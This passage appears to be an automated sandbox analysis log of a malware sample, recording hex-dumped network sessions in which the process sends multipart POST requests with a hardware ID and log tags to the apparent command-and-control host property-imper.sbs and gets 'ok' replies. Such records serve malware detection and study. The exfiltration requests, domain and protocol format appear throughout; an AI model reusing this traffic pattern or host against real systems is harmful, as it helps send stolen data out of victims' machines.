                                                                              2024-11-24 13:56:21 UTC1369INData Raw: 6e 6c 4e 39 45 4e 69 4f 78 67 75 6d 45 70 62 4e 6f 30 63 6d 67 6b 47 35 50 58 53 70 47 75 77 75 56 66 43 59 4f 69 55 65 48 4d 72 58 54 6a 67 46 30 63 65 53 52 2b 70 56 31 73 47 78 41 33 37 46 59 37 73 6f 63 49 55 55 2b 69 30 62 36 4e 49 76 62 42 51 57 69 6f 67 4b 4f 68 4c 63 78 5a 68 44 71 67 6d 54 79 4b 4a 43 4c 49 4e 4e 73 54 4a 31 71 68 62 72 49 6c 66 33 6d 7a 45 2b 41 52 2f 4d 77 6b 42 39 57 5a 54 4a 68 67 76 79 57 36 44 57 76 6c 49 77 78 33 6d 2f 4d 48 32 74 41 61 73 37 46 65 37 63 4d 53 42 54 51 6f 72 62 53 6a 45 51 33 4d 69 61 51 36 55 55 6e 39 53 6f 54 79 69 58 53 37 77 33 66 61 55 62 34 69 6c 63 2b 70 63 38 49 52 63 64 79 35 41 45 66 52 44 4d 6a 73 59 4c 6e 41 75 62 79 6f 64 49 4b 6f 77 4d 6f 33 42 71 36 68 44 6e 5a 41 4f 33 6d 44 6f 6b 47 52 58
                                                                              Data Ascii: nlN9ENiOxgumEpbNo0cmgkG5PXSpGuwuVfCYOiUeHMrXTjgF0ceSR+pV1sGxA37FY7socIUU+i0b6NIvbBQWiogKOhLcxZhDqgmTyKJCLINNsTJ1qhbrIlf3mzE+AR/MwkB9WZTJhgvyW6DWvlIwx3m/MH2tAas7Fe7cMSBTQorbSjEQ3MiaQ6UUn9SoTyiXS7w3faUb4ilc+pc8IRcdy5AEfRDMjsYLnAubyodIKowMo3Bq6hDnZAO3mDokGRX
                                                                              2024-11-24 13:56:21 UTC184INData Raw: 52 44 51 79 4a 45 4c 35 46 75 52 33 75 6b 62 5a 71 70 72 69 58 78 53 6b 46 66 30 61 6b 4b 33 6d 7a 70 73 53 31 72 47 30 30 59 31 47 4e 4c 48 6b 6b 47 6a 45 4a 72 4e 72 55 38 76 67 45 71 39 4f 33 61 72 45 2b 63 75 58 66 53 66 4f 53 4d 63 45 6f 71 65 43 6a 6f 50 6c 4a 62 65 62 72 30 51 6d 4d 44 70 58 47 69 63 44 4c 73 79 4d 2f 4a 58 35 79 31 64 38 5a 6b 36 4c 52 55 53 7a 39 68 4f 50 42 48 53 7a 5a 46 50 72 78 71 5a 77 71 56 4e 4c 49 52 4e 73 44 56 38 6f 52 4b 72 61 68 76 77 68 48 5a 30 55 79 76 4a 78 6c 30 74 47 35 54 52 30 46 4c 71 48 4a 71 0d 0a
                                                                              Data Ascii: RDQyJEL5FuR3ukbZqpriXxSkFf0akK3mzpsS1rG00Y1GNLHkkGjEJrNrU8vgEq9O3arE+cuXfSfOSMcEoqeCjoPlJbebr0QmMDpXGicDLsyM/JX5y1d8Zk6LRUSz9hOPBHSzZFPrxqZwqVNLIRNsDV8oRKrahvwhHZ0UyvJxl0tG5TR0FLqHJq
                                                                              2024-11-24 13:56:21 UTC1369INData Raw: 33 37 61 35 0d 0a 47 38 51 4d 6e 6c 30 61 32 4d 48 61 6c 45 75 67 72 58 50 71 61 4f 69 59 61 45 73 7a 66 51 79 38 55 32 4d 43 5a 52 61 59 56 6d 38 79 71 54 6d 62 4c 44 4c 73 6d 4d 2f 4a 58 78 79 4e 57 32 5a 63 36 4b 31 4d 46 68 4d 6b 4b 4f 68 75 55 6c 74 35 48 6f 42 65 66 78 71 42 47 4c 6f 35 46 75 54 39 34 72 78 54 74 4b 56 54 2b 6a 6a 77 76 48 52 6e 47 33 45 77 38 46 4d 62 47 6c 77 76 6b 57 35 48 65 36 52 74 6d 70 45 4b 78 4b 6e 53 36 56 2f 52 71 51 72 65 62 4f 6d 78 4c 57 73 6e 52 52 54 34 57 32 63 69 58 51 36 6f 64 6b 38 6d 6b 54 53 47 43 54 4c 45 77 66 4b 77 66 35 69 68 51 2b 5a 55 77 4c 42 49 51 69 70 34 4b 4f 67 2b 55 6c 74 35 37 71 52 75 57 33 65 6c 63 61 4a 77 4d 75 7a 49 7a 38 6c 66 35 4c 6c 4c 33 6e 7a 6b 72 46 78 48 47 31 55 38 79 46 4e 33 4c
                                                                              Data Ascii: 37a5G8QMnl0a2MHalEugrXPqaOiYaEszfQy8U2MCZRaYVm8yqTmbLDLsmM/JXxyNW2Zc6K1MFhMkKOhuUlt5HoBefxqBGLo5FuT94rxTtKVT+jjwvHRnG3Ew8FMbGlwvkW5He6RtmpEKxKnS6V/RqQrebOmxLWsnRRT4W2ciXQ6odk8mkTSGCTLEwfKwf5ihQ+ZUwLBIQip4KOg+Ult57qRuW3elcaJwMuzIz8lf5LlL3nzkrFxHG1U8yFN3L
                                                                              2024-11-24 13:56:21 UTC1369INData Raw: 75 52 79 75 6b 62 5a 6f 52 41 73 7a 31 38 71 52 54 71 4c 6b 6e 6c 6b 44 38 6b 46 68 62 42 33 6b 77 76 45 64 76 48 6e 55 69 6a 48 4a 37 4b 6f 30 41 68 78 51 4c 38 4f 57 76 71 54 36 73 48 54 4f 65 52 64 6a 4e 64 41 34 72 58 52 6e 31 50 6c 4d 61 54 51 36 41 66 6b 63 75 75 52 53 2b 58 52 62 6b 77 63 36 34 63 35 43 4a 66 39 4a 77 6b 4b 68 63 53 79 64 31 48 4d 78 54 51 6a 74 41 4c 72 51 50 57 6e 75 6c 78 4b 34 74 58 73 7a 6c 69 6f 46 66 30 61 6b 4b 33 6d 7a 70 73 53 31 72 4f 33 6c 67 32 46 74 2f 46 6b 45 79 6c 48 70 7a 47 70 6b 63 6c 69 30 65 39 50 58 75 6e 47 75 55 75 55 76 36 62 4f 69 67 55 57 6f 53 51 54 53 56 58 6a 49 36 31 61 6f 63 33 6b 64 7a 70 58 47 69 63 44 4c 73 79 4d 2f 4a 58 35 79 31 58 2f 5a 63 78 4a 68 30 54 78 4e 74 59 4c 78 54 51 7a 5a 64 49 72
                                                                              Data Ascii: uRyukbZoRAsz18qRTqLknlkD8kFhbB3kwvEdvHnUijHJ7Ko0AhxQL8OWvqT6sHTOeRdjNdA4rXRn1PlMaTQ6AfkcuuRS+XRbkwc64c5CJf9JwkKhcSyd1HMxTQjtALrQPWnulxK4tXszlioFf0akK3mzpsS1rO3lg2Ft/FkEylHpzGpkcli0e9PXunGuUuUv6bOigUWoSQTSVXjI61aoc3kdzpXGicDLsyM/JX5y1X/ZcxJh0TxNtYLxTQzZdIr
                                                                              2024-11-24 13:56:21 UTC1369INData Raw: 71 52 32 62 4c 44 4c 73 6d 4d 2f 4a 58 78 69 68 63 33 70 73 74 62 41 78 55 30 35 42 4e 4d 56 65 4d 6a 70 39 41 6f 42 53 62 78 61 39 41 4c 59 42 47 76 54 6c 37 70 77 58 6f 4b 31 54 7a 6e 44 6b 71 46 52 76 46 31 6b 30 30 46 74 7a 4a 33 67 58 71 48 49 36 47 38 51 4d 49 67 6b 2b 34 66 6d 7a 6b 44 71 73 6a 56 37 66 45 64 69 77 5a 45 4d 44 65 53 6a 6f 46 30 73 65 65 53 4c 67 59 6b 4d 36 76 54 79 71 49 52 4c 55 2b 64 71 45 61 34 43 6c 64 39 35 63 33 62 46 31 61 7a 63 67 4b 5a 56 66 6c 77 35 42 50 70 42 69 47 77 65 6c 63 61 4a 77 4d 75 7a 49 7a 38 6c 66 6b 4c 55 6e 77 6d 54 34 6c 45 78 54 44 32 55 30 35 46 4e 58 4b 6b 6b 53 6a 47 4a 37 48 6f 55 77 6c 68 55 65 30 4e 48 4b 6b 45 71 74 71 47 2f 43 45 64 6e 52 54 4e 63 6e 56 51 54 78 56 38 38 69 5a 52 2b 6f 45 32 4e
                                                                              Data Ascii: qR2bLDLsmM/JXxihc3pstbAxU05BNMVeMjp9AoBSbxa9ALYBGvTl7pwXoK1TznDkqFRvF1k00FtzJ3gXqHI6G8QMIgk+4fmzkDqsjV7fEdiwZEMDeSjoF0seeSLgYkM6vTyqIRLU+dqEa4Cld95c3bF1azcgKZVflw5BPpBiGwelcaJwMuzIz8lfkLUnwmT4lExTD2U05FNXKkkSjGJ7HoUwlhUe0NHKkEqtqG/CEdnRTNcnVQTxV88iZR+oE2N
                                                                              2024-11-24 13:56:21 UTC1369INData Raw: 68 6b 4b 79 4f 57 57 37 57 73 77 2b 56 76 47 4c 4a 32 78 64 57 73 79 51 45 6d 31 5a 6c 4d 71 50 43 2f 4a 4c 78 4a 33 38 45 48 48 56 48 71 4e 77 61 75 6f 42 71 33 77 4a 75 64 77 6b 62 45 74 61 6a 64 4e 59 4c 78 48 58 32 4a 30 4d 6c 43 57 34 77 61 39 47 49 5a 55 4f 6b 6a 56 6e 72 56 65 6c 5a 46 53 33 78 41 39 73 57 31 72 31 6e 67 6f 6c 56 34 79 4f 71 30 69 6b 46 5a 48 51 75 41 34 49 67 6b 71 35 4f 57 50 6f 4f 65 41 77 58 4c 66 53 64 69 70 54 51 70 71 65 43 6a 6b 47 6c 4a 62 4f 47 66 46 4f 78 5a 48 35 45 54 6e 4c 56 66 77 6f 4d 2f 4a 46 70 57 52 4a 74 38 52 32 61 78 41 49 32 4e 5a 4a 4b 78 53 54 38 4b 42 49 76 42 61 5a 7a 61 68 39 47 4b 74 42 76 54 31 39 36 43 62 39 4b 55 76 30 6d 54 45 53 4c 52 54 4e 78 45 30 7a 45 64 53 4f 30 41 75 6c 57 38 37 2f 36 51 74
                                                                              Data Ascii: hkKyOWW7Wsw+VvGLJ2xdWsyQEm1ZlMqPC/JLxJ38EHHVHqNwauoBq3wJudwkbEtajdNYLxHX2J0MlCW4wa9GIZUOkjVnrVelZFS3xA9sW1r1ngolV4yOq0ikFZHQuA4Igkq5OWPoOeAwXLfSdipTQpqeCjkGlJbOGfFOxZH5ETnLVfwoM/JFpWRJt8R2axAI2NZJKxST8KBIvBaZzah9GKtBvT196Cb9KUv0mTESLRTNxE0zEdSO0AulW87/6Qt
                                                                              2024-11-24 13:56:21 UTC1369INData Raw: 47 34 68 38 55 4b 34 63 77 75 6c 67 33 67 31 55 77 79 4b 69 42 68 7a 56 38 61 4f 78 67 76 74 47 49 54 55 72 30 41 77 68 67 75 43 41 46 53 6b 45 4f 6f 79 53 2f 71 51 46 79 38 43 45 50 54 75 58 7a 34 5a 32 73 6d 49 57 75 70 56 31 73 6e 70 47 78 2f 46 42 50 77 42 50 65 6f 50 71 33 77 62 77 70 38 34 49 68 51 4d 32 35 31 74 4d 78 44 56 32 49 35 47 70 6a 71 56 31 36 4d 44 61 4d 56 4b 2f 47 59 68 35 46 66 76 4e 52 75 76 7a 47 52 33 52 6b 6d 64 67 42 67 69 57 63 32 4f 69 41 76 79 53 64 69 47 75 77 4e 2b 78 51 75 2f 4c 47 47 73 46 50 30 6e 48 4d 6d 69 45 7a 73 51 43 73 7a 54 64 41 4d 38 32 4d 69 5a 55 61 30 64 73 4f 62 70 44 57 61 4b 44 4f 51 48 4d 2b 4a 58 31 47 6f 62 37 39 78 75 62 43 59 5a 78 4e 35 4e 4b 77 61 5a 36 34 6c 49 75 68 32 56 68 75 63 44 49 4d 55 55
                                                                              Data Ascii: G4h8UK4cwulg3g1UwyKiBhzV8aOxgvtGITUr0AwhguCAFSkEOoyS/qQFy8CEPTuXz4Z2smIWupV1snpGx/FBPwBPeoPq3wbwp84IhQM251tMxDV2I5GpjqV16MDaMVK/GYh5FfvNRuvzGR3RkmdgBgiWc2OiAvySdiGuwN+xQu/LGGsFP0nHMmiEzsQCszTdAM82MiZUa0dsObpDWaKDOQHM+JX1Gob79xubCYZxN5NKwaZ64lIuh2VhucDIMUU


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.749704172.67.162.844437472C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-24 13:56:23 UTC280OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=PXS8L39KKN0OTL
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 12826
                                                                              Host: property-imper.sbs
                                                                              2024-11-24 13:56:23 UTC12826OUTData Raw: 2d 2d 50 58 53 38 4c 33 39 4b 4b 4e 30 4f 54 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 32 35 31 31 39 35 46 46 45 34 43 43 34 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 50 58 53 38 4c 33 39 4b 4b 4e 30 4f 54 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 58 53 38 4c 33 39 4b 4b 4e 30 4f 54 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 50 58
                                                                              Data Ascii: --PXS8L39KKN0OTLContent-Disposition: form-data; name="hwid"12251195FFE4CC48D7CBBD6DF28D3732--PXS8L39KKN0OTLContent-Disposition: form-data; name="pid"2--PXS8L39KKN0OTLContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--PX
                                                                              2024-11-24 13:56:24 UTC1016INHTTP/1.1 200 OK
                                                                              Date: Sun, 24 Nov 2024 13:56:24 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=k4tj7dnjq8nnbmecl06ipfsvmu; expires=Thu, 20-Mar-2025 07:43:02 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oRty92QtC0oTL%2BXNXSiNCBlTvEs%2FTuCNkHg7o6oyovjzAJoDnP5V32cXhOxgXheK5wCm27jKfCpDgF37xpFcVeWSHSSsKi7arCkIoxC1vt2DqEzWUpBlTrbL6kzzzCOq0VEc9QQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e79e6ee1fbf42a9-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2180&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13764&delivery_rate=1365762&cwnd=183&unsent_bytes=0&cid=ea65213a0ab27e3d&ts=1008&x=0"
                                                                              2024-11-24 13:56:24 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                              Data Ascii: eok 8.46.123.75
                                                                              2024-11-24 13:56:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.749705172.67.162.844437472C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-24 13:56:25 UTC278OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=XOWQ8R70FVEH
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 15046
                                                                              Host: property-imper.sbs
                                                                              2024-11-24 13:56:25 UTC15046OUTData Raw: 2d 2d 58 4f 57 51 38 52 37 30 46 56 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 32 35 31 31 39 35 46 46 45 34 43 43 34 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 58 4f 57 51 38 52 37 30 46 56 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 4f 57 51 38 52 37 30 46 56 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 58 4f 57 51 38 52 37 30
                                                                              Data Ascii: --XOWQ8R70FVEHContent-Disposition: form-data; name="hwid"12251195FFE4CC48D7CBBD6DF28D3732--XOWQ8R70FVEHContent-Disposition: form-data; name="pid"2--XOWQ8R70FVEHContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--XOWQ8R70
                                                                              2024-11-24 13:56:26 UTC1019INHTTP/1.1 200 OK
                                                                              Date: Sun, 24 Nov 2024 13:56:26 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=5qe47p708996b9smq35r30jdlr; expires=Thu, 20-Mar-2025 07:43:05 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gPggaSe0mCOBXi4ZeAKE1RlP9YgIrk9sKmHkdfbgzbpI7MbfB92EZ87fXSFqsf8xuB1wX%2Fqj7Mv5%2B8lM1Ostpeo2HEXmkHYDjgLMKZQ7D%2FrXXJBm9ZeNyJn%2FGYVgFaDaSCT7fwA%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e79e6fcda25728a-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1808&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2846&recv_bytes=15982&delivery_rate=1527995&cwnd=224&unsent_bytes=0&cid=bf8b179ea245e876&ts=905&x=0"
                                                                              2024-11-24 13:56:26 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                              Data Ascii: eok 8.46.123.75
                                                                              2024-11-24 13:56:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.749716172.67.162.844437472C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-24 13:56:28 UTC277OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=0K8HMKZ6QXJ
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 20365
                                                                              Host: property-imper.sbs
                                                                              2024-11-24 13:56:28 UTC15331OUTData Raw: 2d 2d 30 4b 38 48 4d 4b 5a 36 51 58 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 32 35 31 31 39 35 46 46 45 34 43 43 34 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 30 4b 38 48 4d 4b 5a 36 51 58 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 4b 38 48 4d 4b 5a 36 51 58 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 4b 38 48 4d 4b 5a 36 51 58 4a
                                                                              Data Ascii: --0K8HMKZ6QXJContent-Disposition: form-data; name="hwid"12251195FFE4CC48D7CBBD6DF28D3732--0K8HMKZ6QXJContent-Disposition: form-data; name="pid"3--0K8HMKZ6QXJContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--0K8HMKZ6QXJ
                                                                              2024-11-24 13:56:28 UTC5034OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                              2024-11-24 13:56:29 UTC1021INHTTP/1.1 200 OK
                                                                              Date: Sun, 24 Nov 2024 13:56:29 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=05gqeaec8ejod1c6f8sn604dt1; expires=Thu, 20-Mar-2025 07:43:07 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7UDBJ54YreuJ1eauZ9YBAcHDTpMNg4wjTLfzx8rsUzXVC0%2BE2hG1Yh46xnNuWl34I%2B0z%2B5eSaOAHc%2F4MtOdgRqdCWT7c6yC23KvFjz0BenOi7seA%2FPCAUl2Gi14xZpGesP2hh0c%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e79e70eca18436e-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1635&sent=14&recv=26&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21322&delivery_rate=1745367&cwnd=235&unsent_bytes=0&cid=d57ebbb405ba0f0a&ts=881&x=0"
                                                                              2024-11-24 13:56:29 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                              Data Ascii: eok 8.46.123.75
                                                                              2024-11-24 13:56:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.749722172.67.162.844437472C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-24 13:56:30 UTC273OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=BI31JNVD
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 1183
                                                                              Host: property-imper.sbs
                                                                              2024-11-24 13:56:30 UTC1183OUTData Raw: 2d 2d 42 49 33 31 4a 4e 56 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 32 35 31 31 39 35 46 46 45 34 43 43 34 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 42 49 33 31 4a 4e 56 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 49 33 31 4a 4e 56 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 42 49 33 31 4a 4e 56 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                              Data Ascii: --BI31JNVDContent-Disposition: form-data; name="hwid"12251195FFE4CC48D7CBBD6DF28D3732--BI31JNVDContent-Disposition: form-data; name="pid"1--BI31JNVDContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--BI31JNVDContent-Di
                                                                              2024-11-24 13:56:31 UTC1020INHTTP/1.1 200 OK
                                                                              Date: Sun, 24 Nov 2024 13:56:31 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=lf892c7r1v4kafbbtdlrted9bb; expires=Thu, 20-Mar-2025 07:43:10 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eAC%2F30RfL5e1%2FpC3%2FQM96lc44FWJ8LuDLXk1epNiGVWB5sOJbKbzyQYsp%2B2rtHpoxLMK9DZ2h36vi4uWxFY9X%2Fq7PjP6gI1NldalkGZCuxAN16b%2BOcv6Ytsy1ZPgHti5QBVbuVQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e79e71d9cc0729b-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1827&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2092&delivery_rate=1592148&cwnd=249&unsent_bytes=0&cid=9bf9ffc239282290&ts=730&x=0"
                                                                              2024-11-24 13:56:31 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                              Data Ascii: eok 8.46.123.75
                                                                              2024-11-24 13:56:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.749728172.67.162.844437472C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-24 13:56:33 UTC279OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=HO9HQRQFY2M9
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 550291
                                                                              Host: property-imper.sbs
